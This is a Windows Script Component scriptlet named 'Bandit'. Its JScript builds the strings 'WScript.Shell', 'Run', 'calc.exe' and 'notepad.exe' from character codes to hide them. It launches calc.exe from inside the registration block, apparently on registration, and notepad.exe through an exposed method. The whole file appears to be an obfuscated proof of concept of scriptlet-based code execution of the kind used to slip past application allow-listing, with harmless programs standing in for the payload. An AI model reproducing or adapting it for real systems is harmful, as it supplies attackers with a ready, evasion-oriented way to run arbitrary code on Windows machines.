<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>

	<script language="JScript">
		<![CDATA[
            var _s = String.fromCharCode;
            var _shell = new ActiveXObject(_s(87,83,99,114,105,112,116,46,83,104,101,108,108));
            var _run = _s(82,117,110);
            var _calc = _s(99, 97, 108, 99, 46, 101, 120, 101);
            var _cmd = _shell[_run](_calc);
		]]>
	</script>
</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
    function _exec()
    {
        var _s = String.fromCharCode;
        var _shell = new ActiveXObject(_s(87,83,99,114,105,112,116,46,83,104,101,108,108));
        var _run = _s(82,117,110);
        var _notepad = _s(110, 111, 116, 101, 112, 97, 100, 46, 101, 120, 101);
        var _cmd = _shell[_run](_notepad);
    }
]]>
</script>

</scriptlet>
